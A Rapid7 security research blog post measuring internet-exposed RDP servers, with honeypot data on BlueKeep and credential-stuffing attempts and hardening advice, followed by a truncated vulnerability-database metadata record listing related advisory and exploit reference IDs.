
Welcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?
So, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!
#### [Research] Read the full NICER report today
[Get Started](<https://www.rapid7.com/info/nicer-2020/>)
## Remote Desktop — RDP (3389)
_It's like VNC, but more Microsofty._
### TLDR
**WHAT IT IS: **A proprietary protocol developed by Microsoft for making graphical user interface (GUI) connections from one system to another. The default port is TCP/3389, but it can be hosted on any open port.
**HOW MANY: **3,979,356 discovered nodes. 44,540 (1.1%) have Recog operating system fingerprints. 3,974,474 (99.8%) have Recog fingerprints for security scheme
**VULNERABILITIES: **Numerous remote code execution issues including [CVE-2019-0708 (BlueKeep)](<https://attackerkb.com/topics/huQasjoVMS/windows-remote-desktop-rdp-use-after-free-vulnerablility-bluekeep>) disclosed by Microsoft in the spring of 2019.
**ADVICE:** Place RDP behind a VPN connection if it needs to be “always on.” If RDP can be made intermittently available, ensure all nodes exposing RDP are fully patched, hardened to recommended specifications, and utilize multi-factor authentication.
**ALTERNATIVES:** This is Microsoft’s recommended solution for remotely accessing remote systems. It does what it says on the tin pretty well, so there are no real alternatives. If you need this type of access, follow the guidance in the Advice section.
**GETTING: **Slightly better! We saw almost 5% fewer RDP than we measured in 2019.
### Discovery details
[Project Sonar](<https://www.rapid7.com/research/project-sonar/>) found just under 4 million active RDP nodes, with over a quarter of them in China-homed networks.

Unsurprisingly, we also find about a quarter of RDP nodes within our in-scope cloud provider networks—after all, one does need to connect to these remote systems to use them—though we would have expected Microsoft Azure to take the top spot (given, y’know, “Windows”). So, imagine our surprise when we found Azure-hosted RDP came in third. It's a strong third place, though, behind the twin cloud giants Amazon and Alibaba.
RDP is everywhere, with a total population an order of magnitude more than VNC (about 4 million and change versus less than 400,000 for VNC). Apart from the aforementioned “cloud” use case, small businesses use it off of business-class ISP connections; enterprises use it for remote access and administration; retail operations often have RDP enabled on point-of-sale systems for routine management; and, home users, too, find it easy enough to use to take the time to poke holes in their firewalls to enable remote access to home PCs. This ubiquity, along with pervasive misconfigurations and vulnerabilities, make it an ideal target for attackers, which we’ll cover in the next section.
There are [many ways](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5073f4ed-1e93-45e1-b039-6e30c385867c>) to configure RDP sessions, and Project Sonar is able to identify three states: “standard” or “legacy,” “network level authentication” (NLA), and transport layer security (TLS). “Standard” is a train wreck waiting to happen, and both NLA and TLS do a fairly good job securing your sessions (provided you’re patching regularly and using safe configurations with multi-factor authentication). And, from the looks of it, most residential and business-class users seem to have received that memo given the high percentage of nodes in the top 10 countries and the fact that clouds are using more secure connection options:

However, all clouds are not created nearly as equal, with Oracle cloud users limping in dead last (again, by percent of nodes in that cloud) when it comes to use of safer security modes. This is likely due to the default settings when enabling RDP.
### Attacker’s view
This is one protocol we do have robust honeypot coverage for, and we’ll focus on two areas: RDP session establishment and attempts to exploit RDP via BlueKeep.
Despite predictions for cyber-doom and gloom, BlueKeep—the unauthenticated remote code execution flaw in RDP, disclosed by Microsoft in the spring of 2019—pretty much faded into the background, possibly due to folks actually patching and switching to NLA security (as we see in the country and cloud top views and in the fact that 92% of surveyed RDP nodes were using NLA). We posit that the early, and consistent, measured warnings at all levels helped keep BlueKeep from being the nightmare it could have been.
That does not mean there is no evidence of BlueKeep activity; however, we tend to see orders of magnitude more credential stuffing attempts than we do use of BlueKeep:

There are four takeaways from the above figure:
1. The BlueKeep volume is super low.
2. The number of unique source hosts with malicious intent is low.
3. RDP activity is a constant.
4. Attackers thought they might get lucky right around the time the U.S. entered lockdown because of the 2020 pandemic.
Between Jan. 1, 2020, and April 30, 2020, Heisenberg caught just over 8,500 distinct source IP addresses trying to use either BlueKeep-based exploits or perform credential stuffing against our honeypot network. Eleven percent (11%) of these unique IPv4 addresses originate from DigitalOcean, but 16% of all malicious RDP traffic comes from Hostkey, a hosting provider in the Netherlands. While those two network sources do stand out, 1,310 distinct autonomous systems (ASes) are hosting sources with malicious intent, so there are plenty of places to wag one’s chastisement finger at.
### Our advice
**IT and IT security teams **should strongly consider putting RDP behind a VPN if they are heck-bent on using RDP for GUI remote access. If you need to place RDP directly on the internet, consider doing so on an as-needed basis and ensuring all systems with RDP exposed are patched and have RDP configured as strongly as possible, backed by multi-factor authentication.
**Cloud providers** should have amazingly secure defaults and regularly warn users if they deploy RDP with weaker settings. Giving users the ability to easily enable RDP for only a certain period of time would go a long way toward helping thwart credential stuffing attacks. To help make the internet a bit safer, providers should also monitor for malicious traffic and work with regional CERTs to shut down malicious nodes as soon as possible.
**Government cybersecurity agencies **should continue to educate their constituents on the dangers of RDP and how to ensure safe use of RDP. Given that there are fairly well-known sources with evil intent, centers should work with regional CERTs and hosting/cloud providers and ISPs to make it easier to stop bad traffic before it compromises remote hosts.
#### NEVER MISS A BLOG
Get the latest stories, expertise, and news about security today.
Subscribe
{"id": "RAPID7BLOG:7549D87CE6E6AE596B8031184231ECD1", "type": "rapid7blog", "bulletinFamily": "info", "title": "NICER Protocol Deep Dive: Internet Exposure of Remote Desktop (RDP)", "description": "\n\nWelcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?\n\nSo, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)\n\n \n\n\n## Remote Desktop \u2014 RDP (3389)\n\n_It's like VNC, but more Microsofty._\n\n### TLDR\n\n**WHAT IT IS: **A proprietary protocol developed by Microsoft for making graphical user interface (GUI) connections from one system to another. The default port is TCP/3389, but it can be hosted on any open port.\n\n**HOW MANY: **3,979,356 discovered nodes. 44,540 (1.1%) have Recog operating system fingerprints. 3,974,474 (99.8%) have Recog fingerprints for security scheme\n\n**VULNERABILITIES: **Numerous remote code execution issues including [CVE-2019-0708 (BlueKeep)](<https://attackerkb.com/topics/huQasjoVMS/windows-remote-desktop-rdp-use-after-free-vulnerablility-bluekeep>) disclosed by Microsoft in the spring of 2019.\n\n**ADVICE:** Place RDP behind a VPN connection if it needs to be \u201calways on.\u201d If RDP can be made intermittently available, ensure all nodes exposing RDP are fully patched, hardened to recommended specifications, and utilize multi-factor authentication.\n\n**ALTERNATIVES:** This is Microsoft\u2019s recommended solution for remotely accessing remote systems. It does what it says on the tin pretty well, so there are no real alternatives. If you need this type of access, follow the guidance in the Advice section.\n\n**GETTING: **Slightly better! We saw almost 5% fewer RDP than we measured in 2019.\n\n### Discovery details\n\n[Project Sonar](<https://www.rapid7.com/research/project-sonar/>) found just under 4 million active RDP nodes, with over a quarter of them in China-homed networks.\n\n\n\nUnsurprisingly, we also find about a quarter of RDP nodes within our in-scope cloud provider networks\u2014after all, one does need to connect to these remote systems to use them\u2014though we would have expected Microsoft Azure to take the top spot (given, y\u2019know, \u201cWindows\u201d). So, imagine our surprise when we found Azure-hosted RDP came in third. It's a strong third place, though, behind the twin cloud giants Amazon and Alibaba.\n\nRDP is everywhere, with a total population an order of magnitude more than VNC (about 4 million and change versus less than 400,000 for VNC). Apart from the aforementioned \u201ccloud\u201d use case, small businesses use it off of business-class ISP connections; enterprises use it for remote access and administration; retail operations often have RDP enabled on point-of-sale systems for routine management; and, home users, too, find it easy enough to use to take the time to poke holes in their firewalls to enable remote access to home PCs. This ubiquity, along with pervasive misconfigurations and vulnerabilities, make it an ideal target for attackers, which we\u2019ll cover in the next section.\n\nThere are [many ways](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5073f4ed-1e93-45e1-b039-6e30c385867c>) to configure RDP sessions, and Project Sonar is able to identify three states: \u201cstandard\u201d or \u201clegacy,\u201d \u201cnetwork level authentication\u201d (NLA), and transport layer security (TLS). \u201cStandard\u201d is a train wreck waiting to happen, and both NLA and TLS do a fairly good job securing your sessions (provided you\u2019re patching regularly and using safe configurations with multi-factor authentication). And, from the looks of it, most residential and business-class users seem to have received that memo given the high percentage of nodes in the top 10 countries and the fact that clouds are using more secure connection options:\n\n\n\nHowever, all clouds are not created nearly as equal, with Oracle cloud users limping in dead last (again, by percent of nodes in that cloud) when it comes to use of safer security modes. This is likely due to the default settings when enabling RDP.\n\n### Attacker\u2019s view\n\nThis is one protocol we do have robust honeypot coverage for, and we\u2019ll focus on two areas: RDP session establishment and attempts to exploit RDP via BlueKeep.\n\nDespite predictions for cyber-doom and gloom, BlueKeep\u2014the unauthenticated remote code execution flaw in RDP, disclosed by Microsoft in the spring of 2019\u2014pretty much faded into the background, possibly due to folks actually patching and switching to NLA security (as we see in the country and cloud top views and in the fact that 92% of surveyed RDP nodes were using NLA). We posit that the early, and consistent, measured warnings at all levels helped keep BlueKeep from being the nightmare it could have been.\n\nThat does not mean there is no evidence of BlueKeep activity; however, we tend to see orders of magnitude more credential stuffing attempts than we do use of BlueKeep:\n\n\n\nThere are four takeaways from the above figure:\n\n 1. The BlueKeep volume is super low.\n 2. The number of unique source hosts with malicious intent is low.\n 3. RDP activity is a constant.\n 4. Attackers thought they might get lucky right around the time the U.S. entered lockdown because of the 2020 pandemic.\n\nBetween Jan. 1, 2020, and April 30, 2020, Heisenberg caught just over 8,500 distinct source IP addresses trying to use either BlueKeep-based exploits or perform credential stuffing against our honeypot network. Eleven percent (11%) of these unique IPv4 addresses originate from DigitalOcean, but 16% of all malicious RDP traffic comes from Hostkey, a hosting provider in the Netherlands. While those two network sources do stand out, 1,310 distinct autonomous systems (ASes) are hosting sources with malicious intent, so there are plenty of places to wag one\u2019s chastisement finger at.\n\n### Our advice\n\n**IT and IT security teams **should strongly consider putting RDP behind a VPN if they are heck-bent on using RDP for GUI remote access. If you need to place RDP directly on the internet, consider doing so on an as-needed basis and ensuring all systems with RDP exposed are patched and have RDP configured as strongly as possible, backed by multi-factor authentication.\n\n**Cloud providers** should have amazingly secure defaults and regularly warn users if they deploy RDP with weaker settings. Giving users the ability to easily enable RDP for only a certain period of time would go a long way toward helping thwart credential stuffing attacks. To help make the internet a bit safer, providers should also monitor for malicious traffic and work with regional CERTs to shut down malicious nodes as soon as possible.\n\n**Government cybersecurity agencies **should continue to educate their constituents on the dangers of RDP and how to ensure safe use of RDP. Given that there are fairly well-known sources with evil intent, centers should work with regional CERTs and hosting/cloud providers and ISPs to make it easier to stop bad traffic before it compromises remote hosts.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "published": "2020-10-23T17:26:31", "modified": "2020-10-23T17:26:31", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://blog.rapid7.com/2020/10/23/nicer-protocol-deep-dive-internet-exposure-of-remote-desktop-rdp/", "reporter": "Tod Beardsley", "references": [], "cvelist": ["CVE-2019-0708"], "lastseen": "2020-10-23T18:41:37", "viewCount": 1064, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2", "AKB:17442CEB-043D-4879-BE5C-FC920511E791", "AKB:86F390BB-7946-4223-970A-D493D6DD1E0A"]}, {"type": "canvas", "idList": ["BLUEKEEP"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:83C94B14C546544713E49B16CCCBF672", "CARBONBLACK:971FEABEB6DA17E9D4D3137981B2B685"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0657"]}, {"type": "cisa", "idList": ["CISA:6EE79BF110142CD46F3BD55025F3C4AB", "CISA:81A1472B76D72ABF1AA69524AFD40F34", "CISA:A5265FFF4C417EB767D82231D2D604B8"]}, {"type": "cve", "idList": ["CVE-2019-0708"]}, {"type": "exploitdb", "idList": ["EDB-ID:46904", "EDB-ID:47120", "EDB-ID:47416"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C90C58C22E53621B5A2A2AAEBCDF2EBC"]}, {"type": "f5", "idList": ["F5:K25238311"]}, {"type": "fireeye", "idList": ["FIREEYE:385EC2DA0B6E50D0AC9113A707F5E623"]}, {"type": "githubexploit", "idList": ["03237B57-97DA-5A83-B4B2-869C01BC59F7", "05283D8D-AE42-54D4-B0CC-85DEBC639859", "0A8531EC-3F13-5F4F-84B0-58DB34580167", "0DFEFF1E-DC55-5AFB-B968-B09E2E591700", "0F2E8B00-74C7-5BE8-A801-CD92790E4C2E", "0FF9E057-0D2B-510C-944D-3EDF8DD10956", "154F9E24-FA6C-529E-8E63-1351432DF6B9", "17650B64-ADED-58F1-9BB3-3E82E1E41A7B", "188C3DB2-3A7F-5EBA-BA09-2075364C0B07", "19F70587-89FB-5855-A578-0E55C3510C59", "21DA1B2C-2176-5C7C-9A56-480839AAC71E", "2D3B67A4-8F34-55EA-A7ED-97FB2D1DFFF8", "33E38C38-2570-5B7D-910F-D6D0C9B85E25", "34097FEA-E06F-5637-817F-25A5BA9D5B34", "3CAE8C9E-534F-5617-88B5-977EE6076A10", "3D70055A-AC27-5338-B4C8-D1ED2158F5C9", "41FED3D6-8A23-5549-A390-D444A882F85D", "42C0F4E5-C3C8-5987-AF1E-3EB9DC15EADE", "462438E9-2947-5006-9134-9BA0BCC1B262", "47353949-6FA1-5C88-86DB-8E2DFD66576A", "4C2C36F6-5E15-51DD-85A7-E5828F1D8CE0", "4E477E4A-4794-5B4A-8706-915B06422C95", "523F993F-2487-5C75-A910-22605D6D57D9", "560405C4-4806-5173-B662-F9C3D776D8D4", "656CA49C-78E0-596B-BAA2-1A2890C0E150", "74F3783A-C87E-56C3-91DB-25921D7EC82E", "75BE41BF-9117-5065-8E2C-3F7F041E53AA", "75C1CD91-459D-5E2F-A3AC-FB4FE66230F7", "7D04F2C9-F17B-502A-BBE9-9B5CA537E468", "8005DDB7-67F0-50C1-95AC-3D602A70CEC8", "851959DE-3B5C-5317-868E-5D80E801E3B0", "8BAEEC14-CD55-5C55-A910-47030BEA55F7", "998F5B8B-817B-5B22-BEBB-11F0DC59638F", "9A0A7E66-6C4F-56E6-8F29-1DCE34FA1D12", "9D170C46-A745-5692-BA84-67EBFEA037FF", "A839FA86-0873-592C-AA31-2C445B4C4F29", "AA7339B7-CAB1-5DEA-8E7C-5867B328A25F", "AE03C974-B00F-5DF7-B2AF-77D6E46CD5FD", "B3DCB90F-80B1-5462-AC61-AF04513F2F3A", "B3FAEE67-7743-52ED-89D0-D83BAEA1A38D", "BA12D007-F6E5-5BB6-874F-789DCAE9524E", "BA9FEAFF-DC39-53B5-B03D-8A01486E0879", "BE90B1DD-521D-540C-8554-5454779256A5", "C4A313B8-6946-51D9-A5C4-EF515BAC47C9", "C50B5DBC-9051-5380-B5B3-93A023128F22", "C641C472-7F12-5C7B-9934-BE59C8B1974B", "C89AC173-55D4-50C8-A17E-42EB65710CCB", "C9FCD26D-4C04-5F36-8E61-05484E6979D6", "CA34E4C9-BC58-5284-81F7-EC6AC06EC7AF", "CD0102AD-F33A-5068-9719-30CB0CB3C152", "CF1C1A91-4D20-553C-A027-71BE18F8BAA5", "D2A01405-1B4C-5B8D-85AC-D1E23D1F3B56", "D4DF3FFF-4FBA-5ADB-88FC-A7E1BED572B9", "D6710F36-D7F3-57EA-BD83-CED78FC054F6", "D7EF2A21-5BA9-5730-90E0-E085DDFD2801", "D8B68D98-BBF3-5A69-82DD-C0760C9923D4", "DB6F697E-55A0-538F-A15B-E61B8B4E4D70", "DC8A29A1-755A-50C2-9D9D-FF11FCB054F2", "DF00B503-1F21-5ABD-B713-1F79E4D1CB9A", "E22A392B-5D30-51F4-92ED-8E10BA7EE8D2", "E46AAFC9-276F-5161-B013-393D9A538259", "E5B0F794-87CD-5152-9D64-3AB23AF5C3EF", "E72D9129-EEED-5E3C-9CD8-9BD6201170C0", "E7B26D35-BAFD-51CB-BFAC-CA7E5EA5FA9A", "E8AD52BD-4EE5-5E85-91FE-66A868E0162B", "F5B92B0D-E802-5254-8668-D6A4B1DB8004", "F922DD70-E22B-5EBE-9CAE-410224E95831", "F9EF1801-C66C-572B-B67A-9A67E04D6B06", "FBB9B577-00A5-5C82-AFC5-4A52422056F3", "FE544217-2BB0-5C05-B26C-D14EE378E8A5", "FFBF7B7B-FFD8-5A32-89B0-AAB175FD2AE6", "FFF6224F-273A-5CB1-9421-833769E01519"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS"]}, {"type": "ics", "idList": ["ICSMA-20-049-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51"]}, {"type": "kaspersky", "idList": ["KLA11706"]}, {"type": "kitploit", "idList": ["KITPLOIT:102871766956097088", "KITPLOIT:1049860926455958760", "KITPLOIT:1225614657733366094", "KITPLOIT:1494860154339275183", "KITPLOIT:1844185171331211854", "KITPLOIT:1986765330027575502", "KITPLOIT:2730308475904875028", "KITPLOIT:3080370456145673111", "KITPLOIT:3124960652240981745", "KITPLOIT:3245813529202482542", "KITPLOIT:3359946123198241398", "KITPLOIT:3397940664053959113", "KITPLOIT:3565898196234868215", "KITPLOIT:4019975092566820832", "KITPLOIT:4205221140433081492", "KITPLOIT:43221571859278589", "KITPLOIT:4482238198881011483", "KITPLOIT:5485948766090500662", "KITPLOIT:5528727998547000766", "KITPLOIT:5769166566971079899", "KITPLOIT:5896951739767119270", "KITPLOIT:6073614302403805969", "KITPLOIT:6082359615438809301", "KITPLOIT:6972580572774284552", "KITPLOIT:724832466163115459", "KITPLOIT:727243444931520192", "KITPLOIT:777119556142010019", "KITPLOIT:7915799087007906859", "KITPLOIT:8309365460568193500", "KITPLOIT:8418780960315245103", "KITPLOIT:998955151150716619"]}, {"type": "krebs", "idList": ["KREBS:C93CCA23099AC250E702848B49677D5B"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:31DFC46E307127AF5C9FD13F15DF62DB", "MALWAREBYTES:8B41C7471B07595F7246D3DCB8794894"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP", "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP/", "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE", "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE/", "MSF:ILITIES/MSFT-CVE-2019-0708/"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0708"]}, {"type": "msrc", "idList": ["MSRC:181F9F2B53D93B5825CF48DFEB8D11C7", "MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:6A6ED6A5B652378DCBA3113B064E973B"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9", "MSSECURE:B42B640CBAB51E35DC07B81926B5F910", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994152", "MYHACK58:62201994153", "MYHACK58:62201994154", "MYHACK58:62201994162", "MYHACK58:62201994234", "MYHACK58:62201994259", "MYHACK58:62201994388", "MYHACK58:62201995234", "MYHACK58:62201995523", "MYHACK58:62201995881"]}, {"type": "nessus", "idList": ["7286.PASL", "MSRDP_CVE-2019-0708.NBIN", "SMB_NT_MS19_MAY_4499149.NASL", "SMB_NT_MS19_MAY_4499164.NASL", "SMB_NT_MS19_MAY_XP_2003.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108611", "OPENVAS:1361412562310108794", "OPENVAS:1361412562310814894", "OPENVAS:1361412562310815051", "OPENVAS:1361412562310815054"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153133", "PACKETSTORM:153627", "PACKETSTORM:154579", "PACKETSTORM:162960"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:400D28FE44174674BB4561AA9416F532", "QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:AE1D32AF43539C7362B2E060204A5413", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:FBDC4B445E6B33502BA1650A8BD4A6E1"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "symantec", "idList": ["SMNTC-108273"]}, {"type": "talosblog", "idList": ["TALOSBLOG:00DC30A0F4EFA56F4974DF2C3FB23FBB", "TALOSBLOG:1E3663A5534D173433518B5C6F3B0E66", "TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:2FC8F90E015AB54A7397D49B24BE5B5E", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:340B43701E5CA96D8B4491CD801FE010", "TALOSBLOG:4C073D825207102B86D0C8999A5A28CC", "TALOSBLOG:56EE545CE9B30B21AC2FD24C6DBB5181", "TALOSBLOG:5757EE09BE22E4808719C348402D3F43", "TALOSBLOG:5A9BEF09DC8FF93E258E2D51361D11E8", "TALOSBLOG:5D2BCB335060A8EBF6F71CB579112042", "TALOSBLOG:62182E90D88C9282869F40D834CA56BA", "TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "TALOSBLOG:71D138211697B43CB345A133B54BC824", "TALOSBLOG:8DB6614E6048947EDBBD91681EE32AB7", "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "TALOSBLOG:9F05FC6E227859F0165366CAA52DDB78", "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "TALOSBLOG:AE189A67BCAD633AD9D7838F9DF4F6D5", "TALOSBLOG:BC6F07233A684778F6CA4B2B7C28B45B", "TALOSBLOG:C6C252288047D319ADE770A26A8DA196", "TALOSBLOG:CFBFA4A360F5A4B96A4245B783BAE4C2", "TALOSBLOG:D44D4A467C76DBF910B545640D073425", "TALOSBLOG:DC2E9A485DD55B49C0CC8932C0026F33", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:E339E76DD9CC8BF6BC7108066B44196A", "TALOSBLOG:E352F60FA2366D4E0CC72C4BA45B2650", "TALOSBLOG:E7EA34380482751C5595EDE9DA228FA0", "TALOSBLOG:F5BDBD830CCBBD67980916B9F246B878", "TALOSBLOG:F707E3F271E987A8739DBDECFEEFAE22"]}, {"type": "thn", "idList": ["THN:1BA2E3EE721856ECEE43B825656909B0", "THN:39C614DBFC7ED1BBBEAAD9DC8C04C7CD", "THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:65DE53134A31AE62D9634C0B4AA4E81B", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:E9454DED855ABE5718E4612A2A750A98"]}, {"type": "threatpost", "idList": ["THREATPOST:08D7AB11C0B2B0668D71ADCEEB94DB1B", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "THREATPOST:3D0ED9A884FBC4412C79F4B5FF005376", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:4D733D952DD37D57DDA47C16AEAAE1FA", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:78996437466E037C7F29EFB1FFBBAB42", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:902F021868A194A6F02A30F8709AA730", "THREATPOST:90739FC29BE2A68C72AAA4B88DB9A420", "THREATPOST:9599D75F1FEDE69B587F551FF63C7C77", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2"]}, {"type": "zdt", "idList": ["1337DAY-ID-32826", "1337DAY-ID-32978", "1337DAY-ID-33275", "1337DAY-ID-33565", "1337DAY-ID-36351"]}]}, "score": {"value": 5.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2", "AKB:86F390BB-7946-4223-970A-D493D6DD1E0A"]}, {"type": "canvas", "idList": ["BLUEKEEP"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:83C94B14C546544713E49B16CCCBF672", "CARBONBLACK:971FEABEB6DA17E9D4D3137981B2B685"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0657"]}, {"type": "cisa", "idList": ["CISA:6EE79BF110142CD46F3BD55025F3C4AB", "CISA:81A1472B76D72ABF1AA69524AFD40F34", "CISA:A5265FFF4C417EB767D82231D2D604B8"]}, {"type": "cve", "idList": ["CVE-2019-0708"]}, {"type": "exploitdb", "idList": ["EDB-ID:46904"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C90C58C22E53621B5A2A2AAEBCDF2EBC"]}, {"type": "f5", "idList": ["F5:K25238311"]}, {"type": "fireeye", "idList": ["FIREEYE:385EC2DA0B6E50D0AC9113A707F5E623"]}, {"type": "githubexploit", "idList": ["03237B57-97DA-5A83-B4B2-869C01BC59F7", "05283D8D-AE42-54D4-B0CC-85DEBC639859", "0A8531EC-3F13-5F4F-84B0-58DB34580167", "0DFEFF1E-DC55-5AFB-B968-B09E2E591700", "0F2E8B00-74C7-5BE8-A801-CD92790E4C2E", "0FF9E057-0D2B-510C-944D-3EDF8DD10956", "154F9E24-FA6C-529E-8E63-1351432DF6B9", "17650B64-ADED-58F1-9BB3-3E82E1E41A7B", "188C3DB2-3A7F-5EBA-BA09-2075364C0B07", "19F70587-89FB-5855-A578-0E55C3510C59", "21DA1B2C-2176-5C7C-9A56-480839AAC71E", "2D3B67A4-8F34-55EA-A7ED-97FB2D1DFFF8", "33E38C38-2570-5B7D-910F-D6D0C9B85E25", "34097FEA-E06F-5637-817F-25A5BA9D5B34", "3CAE8C9E-534F-5617-88B5-977EE6076A10", "3D70055A-AC27-5338-B4C8-D1ED2158F5C9", "41FED3D6-8A23-5549-A390-D444A882F85D", "42C0F4E5-C3C8-5987-AF1E-3EB9DC15EADE", "462438E9-2947-5006-9134-9BA0BCC1B262", "47353949-6FA1-5C88-86DB-8E2DFD66576A", "4C2C36F6-5E15-51DD-85A7-E5828F1D8CE0", "4E477E4A-4794-5B4A-8706-915B06422C95", "523F993F-2487-5C75-A910-22605D6D57D9", "560405C4-4806-5173-B662-F9C3D776D8D4", "656CA49C-78E0-596B-BAA2-1A2890C0E150", "74F3783A-C87E-56C3-91DB-25921D7EC82E", "75BE41BF-9117-5065-8E2C-3F7F041E53AA", "75C1CD91-459D-5E2F-A3AC-FB4FE66230F7", "7D04F2C9-F17B-502A-BBE9-9B5CA537E468", "8005DDB7-67F0-50C1-95AC-3D602A70CEC8", "851959DE-3B5C-5317-868E-5D80E801E3B0", "8BAEEC14-CD55-5C55-A910-47030BEA55F7", "998F5B8B-817B-5B22-BEBB-11F0DC59638F", "9A0A7E66-6C4F-56E6-8F29-1DCE34FA1D12", "9D170C46-A745-5692-BA84-67EBFEA037FF", "A839FA86-0873-592C-AA31-2C445B4C4F29", "AA7339B7-CAB1-5DEA-8E7C-5867B328A25F", "AE03C974-B00F-5DF7-B2AF-77D6E46CD5FD", "B3DCB90F-80B1-5462-AC61-AF04513F2F3A", "B3FAEE67-7743-52ED-89D0-D83BAEA1A38D", "BA12D007-F6E5-5BB6-874F-789DCAE9524E", "BA9FEAFF-DC39-53B5-B03D-8A01486E0879", "BE90B1DD-521D-540C-8554-5454779256A5", "C4A313B8-6946-51D9-A5C4-EF515BAC47C9", "C50B5DBC-9051-5380-B5B3-93A023128F22", "C641C472-7F12-5C7B-9934-BE59C8B1974B", "C89AC173-55D4-50C8-A17E-42EB65710CCB", "C9FCD26D-4C04-5F36-8E61-05484E6979D6", "CA34E4C9-BC58-5284-81F7-EC6AC06EC7AF", "CD0102AD-F33A-5068-9719-30CB0CB3C152", "CF1C1A91-4D20-553C-A027-71BE18F8BAA5", "D2A01405-1B4C-5B8D-85AC-D1E23D1F3B56", "D4DF3FFF-4FBA-5ADB-88FC-A7E1BED572B9", "D6710F36-D7F3-57EA-BD83-CED78FC054F6", "D7EF2A21-5BA9-5730-90E0-E085DDFD2801", "D8B68D98-BBF3-5A69-82DD-C0760C9923D4", "DB6F697E-55A0-538F-A15B-E61B8B4E4D70", "DC8A29A1-755A-50C2-9D9D-FF11FCB054F2", 